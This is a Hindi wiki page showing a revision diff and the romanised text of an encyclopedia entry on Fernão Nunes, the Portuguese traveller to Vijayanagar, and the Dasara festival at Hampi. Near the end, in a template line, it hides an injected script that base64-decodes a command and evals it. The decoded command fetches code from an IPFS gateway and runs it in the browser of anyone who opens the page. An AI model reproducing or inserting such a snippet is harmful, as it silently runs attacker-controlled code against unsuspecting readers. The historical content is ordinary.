Difference between revisions of "फरनाओ नुनीज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''फरनाओं नुनीज''' एक पुर्तग़ाली यात्री था, जो 1535 ई. में ...' के साथ नया पन्ना बनाया)
 
 
(One intermediate revision by one other user not shown)
Line 2: Line 2:
  
 
*उसने सम्पूर्ण विजयनगर राज्य का विस्तृत भ्रमण किया और उसके [[इतिहास]] तथा उस समय की राजनीतिक, सामाजिक, धार्मिक-सांस्कृतिक एवं आर्थिक दशा का विस्तृत वर्णन किया है।
 
*उसने सम्पूर्ण विजयनगर राज्य का विस्तृत भ्रमण किया और उसके [[इतिहास]] तथा उस समय की राजनीतिक, सामाजिक, धार्मिक-सांस्कृतिक एवं आर्थिक दशा का विस्तृत वर्णन किया है।
 +
*'[[हरिहर प्रथम|हरिहर]]' और '[[बुक्का प्रथम|बुक्का]]' नाम के दो भाइयों द्वारा 12-13वीं [[शताब्दी]] में स्थापित विजयनगर साम्राज्य में '[[दशहरा]]' उत्सव काफ़ी धूमधाम से मनाया जाता था। [[हम्पी|राजधानी हम्पी]] के दौरे पर पहुंचे कई विदेशी पर्यटकों ने अपने संस्मरणों तथा यात्रा वृत्तान्तों में इस विषय में लिखा है। इनमें डोमिंगोज पेज, फरनाओ नुनीज और रॉबर्ट सीवेल जैसे पर्यटक भी शामिल थे। इन लेखकों ने हम्पी में मनाए जाने वाले [[दशहरा|दशहरा उत्सव]] के बारे में काफ़ी विस्तार से लिखा है।
 
*नुनीज ने विजयनगर को ‘बिश्नाग’ की संज्ञा दी थी।
 
*नुनीज ने विजयनगर को ‘बिश्नाग’ की संज्ञा दी थी।
 +
 +
 +
{{seealso|विजयनगर साम्राज्य|हम्पी}}
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 9: Line 13:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{विदेशी यात्री}}
 
{{विदेशी यात्री}}
[[Category:विदेशी यात्री]][[Category:मध्य काल]][[Category:चरित कोश]][[Category:इतिहास कोश]]
+
[[Category:विदेशी यात्री]][[Category:मध्य काल]][[Category:चरित कोश]][[Category:इतिहास कोश]][[Category:विदेशी]]
 
__INDEX__
 
__INDEX__

Latest revision as of 05:39, 7 January 2020

pharanaoan nunij ek purtagali yatri tha, jo 1535 ee. mean vijayanagar aya tha.

  • usane sampoorn vijayanagar rajy ka vistrit bhraman kiya aur usake itihas tatha us samay ki rajanitik, samajik, dharmik-saanskritik evan arthik dasha ka vistrit varnan kiya hai.
  • 'harihar' aur 'bukka' nam ke do bhaiyoan dvara 12-13vian shatabdi mean sthapit vijayanagar samrajy mean 'dashahara' utsav kafi dhoomadham se manaya jata tha. rajadhani hampi ke daure par pahuanche kee videshi paryatakoan ne apane sansmaranoan tatha yatra vrittantoan mean is vishay mean likha hai. inamean domiangoj pej, pharanao nunij aur r aaubart sivel jaise paryatak bhi shamil the. in lekhakoan ne hampi mean manae jane vale dashahara utsav ke bare mean kafi vistar se likha hai.
  • nunij ne vijayanagar ko ‘bishnag’ ki sanjna di thi.


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh